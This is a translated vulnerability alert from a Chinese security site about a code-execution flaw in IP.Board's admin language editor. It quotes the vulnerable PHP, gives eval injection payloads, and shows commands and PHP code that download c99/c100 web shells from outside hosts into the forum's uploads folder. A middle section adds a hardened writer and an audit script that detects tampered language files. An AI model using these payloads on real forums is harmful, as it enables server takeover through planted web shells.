IP.Board shell-upload summary - Vulnerability Alert - Heiba Security Net (myhack58)

2010-01-17T00:00:00
ID MYHACK58:62201025958
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2010-01-17T00:00:00

Description

There is little discussion of this topic on domestic sites, so here is a summary reproduced from a foreign site:

<http://mgsdl.free.fr/?0:18>

The sixth of the methods listed there:

VI - CODE EXECUTION

The ACP allows admins to manage languages: they can choose the default language, import a new one, and edit them. Let's take a look in the file "sources/action_admin/languages.php":

```php
switch($this->ipsclass->input['code'])
{
    ...
    case 'doedit':
        $this->ipsclass->admin->cp_permission_check(...);
        $this->save_langfile();
        break;
...
function save_langfile()
{
    ...
    $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir'].
                 "/".$this->ipsclass->input['lang_file'];

    if (! file_exists( $lang_file ) ) ...
    ...
    if (! is_writeable( $lang_file ) ) ...
    ...
    $barney = array();

    foreach ($this->ipsclass->input as $k => $v)
    {
        if ( preg_match( "/^XX_(\S+)$/", $k, $match ) )
        {
            if ( isset($this->ipsclass->input[ $match[0] ]) )
            {
                $v = str_replace("&#39;", "'", stripslashes($_POST[$match[0]]));
                $v = str_replace("&lt;", "<", $v );
                $v = str_replace("&gt;", ">", $v );
                $v = str_replace("&amp;", "&", $v );
                $v = str_replace("\r", "", $v );

                $barney[ $match[1] ] = $v;
            }
        }
    }
```

As you can see, several replacements are made. Some HTML entities are converted back to the characters they stand for, and "stripslashes()" is called as well. We don't really care about that; it does not cause a problem by itself, it was just to show you how user input is treated. Now let's see how the change is written to disk:

```php
$start = "<?php\n\n".'$lang = array('."\n";

foreach($barney as $key => $text)
{
    $text = preg_replace("/\n{1,}$/", "", $text);
    $start .= "\n'".$key."' => \"". str_replace( '"', '\"', $text)."\",";
}

$start .= "\n\n);\n\n?".">";

if ($fh = fopen( $lang_file, 'w') )
{
    fwrite($fh, $start );
    fclose($fh);
}
```

So double quotes are escaped, but no other escape character is, and the value ends up inside a double-quoted PHP string. There are several ways to bypass this protection.

The first method is to play with what we call "dynamic variables": with two $ signs inside a double-quoted string, we can execute PHP code. Example: ${${@eval($_SERVER[HTTP_SH])}}

The second one is to use another escape character: a backslash (\) will do the job. The attacker must change two inputs. Example:

First input: hello\
Second input: ); @eval($_SERVER[HTTP_SH]); /*
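The two bypasses above work because the writer in save_langfile() only escapes the double quote before placing admin-supplied text into a double-quoted PHP literal. The block below is an added example, not IPB's code: it reproduces that serialisation, sets a hardened writer next to it (var_export() emits single-quoted literals with both the quote and the backslash escaped, so neither bypass survives), and adds a token-level audit that a defender can run over the cache/lang_cache/*/*.php files named later in this page to find language files that already carry executable code. The function names, the sample inputs and the `audit_lang_cache_dir` directory walk are all constructed for this example.

```php
<?php
// Added example, not IPB code: the advisory's serialisation pattern, a
// hardened writer, and a token-level audit for existing language files.

// Mirrors the pattern quoted from save_langfile(): only '"' is escaped, so
// "\" and "${...}" pass through untouched into a double-quoted PHP literal.
function build_langfile_unsafe(array $strings): string
{
    $out = "<?php\n\n" . '$lang = array(' . "\n";
    foreach ($strings as $key => $text) {
        $text = preg_replace("/\n{1,}$/", "", $text);
        $out .= "\n'" . $key . "' => \"" . str_replace('"', '\"', $text) . "\",";
    }
    return $out . "\n\n);\n\n?" . ">";
}

// Hardened writer: var_export() produces single-quoted literals with "'" and
// "\" escaped, so neither bypass has any effect; keys are restricted to
// identifier characters, which is all a language key ever contains.
function build_langfile_safe(array $strings): string
{
    $clean = array();
    foreach ($strings as $key => $text) {
        if (!preg_match('/^[A-Za-z0-9_]+$/', (string) $key)) {
            continue; // not a key the forum would ever generate
        }
        $clean[$key] = preg_replace("/\n{1,}$/", "", (string) $text);
    }
    return "<?php\n\n\$lang = " . var_export($clean, true) . ";\n";
}

// Audit: a language file should contain nothing but one array of string
// literals. Tokenise it and report every token outside that allow-list
// (an empty result means the file is clean).
function audit_langfile(string $source): array
{
    $allowed_ids   = array(T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_ARRAY,
                           T_CONSTANT_ENCAPSED_STRING, T_DOUBLE_ARROW, T_LNUMBER);
    $allowed_chars = array('=', '(', ')', ',', ';');
    $findings = array();
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok)) {
            list($id, $text) = $tok;
            if ($id === T_VARIABLE && $text === '$lang') {
                continue; // the one variable the file is expected to define
            }
            if (!in_array($id, $allowed_ids, true)) {
                $findings[] = token_name($id) . ' ' . trim($text);
            }
        } elseif (!in_array($tok, $allowed_chars, true)) {
            $findings[] = 'char ' . $tok;
        }
    }
    return $findings;
}

// Walk a lang_cache directory (layout <dir>/<language>/<file>.php as in the
// paths quoted on this page) and return findings keyed by file name.
function audit_lang_cache_dir(string $dir): array
{
    $report = array();
    foreach (glob(rtrim($dir, '/') . '/*/*.php') as $file) {
        $findings = audit_langfile((string) file_get_contents($file));
        if ($findings) {
            $report[$file] = $findings;
        }
    }
    return $report;
}

// Constructed samples: the benign help text from the advisory, a "dynamic
// variable" input, and a two-field backslash input (comment style changed
// to "//" so the sample tokenises cleanly; the effect on the audit is the same).
$samples = array(
    'benign'  => array('help_txt' => 'Choose a topic from the list, or search for a topic'),
    'dynamic' => array('help_txt' => 'Choose a topic ${${phpinfo()}}'),
    'escape'  => array('help_txt' => 'hello\\', 'other' => '); phpinfo(); //'),
);
foreach ($samples as $name => $input) {
    printf("%-8s unsafe writer: %d finding(s), safe writer: %d finding(s)\n",
           $name,
           count(audit_langfile(build_langfile_unsafe($input))),
           count(audit_langfile(build_langfile_safe($input))));
}
```

For the benign sample both writers produce zero findings; for the other two the unsafe writer's output is flagged (T_DOLLAR_OPEN_CURLY_BRACES, T_STRING, T_COMMENT and stray punctuation outside any literal) while the hardened writer's output stays clean, because the payload is now just the contents of a single-quoted string. Running audit_lang_cache_dir() against forums/cache/lang_cache/ is a quick way to check an existing install for files that were edited this way.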

Exploitation


This trick works even against the current IPB version! Just go to Admin -> Look and Feel -> Manage Languages.

Then choose a section, for example: public_help

Edit "help_txt", which originally is "Choose a topic from the list, or search for a topic"

Add some PHP code so that it becomes:

The Code:

Choose a topic from the list, or search for a topic

${${phpinfo()}}

Save the changes. Then go to the help section:

http://localhost/ipb.3.0.0.rc2/index.php?app=core&module=help

... and the PHP code will be executed.

Or this code:

${${phpinfo()}} .......

${${system(wget http://blacknite.eu/php_shells/c100.txt)}}

Or:

Read conf_global.php from the admin panel using basic admin privileges.

The Code:

```php
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
}
fclose($to);
fclose($from);
```

To know the path, you must also be a ROOT ADMIN.

I tested this shell upload on IPB 2.3.6 and all was good.

forums/cache/lang_cache/en/lang_help.php

forums/uploads/